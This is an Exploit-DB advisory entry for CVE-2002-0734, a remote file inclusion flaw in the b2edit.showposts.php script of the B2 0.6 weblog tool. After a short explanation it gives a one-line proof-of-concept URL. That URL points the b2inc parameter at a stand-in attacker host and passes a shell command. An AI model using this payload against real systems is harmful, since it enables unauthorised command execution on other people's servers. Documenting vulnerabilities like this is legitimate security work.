B2 0.6 b2edit.showposts.php b2inc Parameter Remote File Inclusion

2002-05-06T00:00:00
ID EDB-ID:21436
Type exploitdb
Reporter Frank
Modified 2002-05-06T00:00:00

Description

B2 0.6 b2edit.showposts.php b2inc Parameter Remote File Inclusion. CVE-2002-0734 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/4673/info

B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux.

A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system. 

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls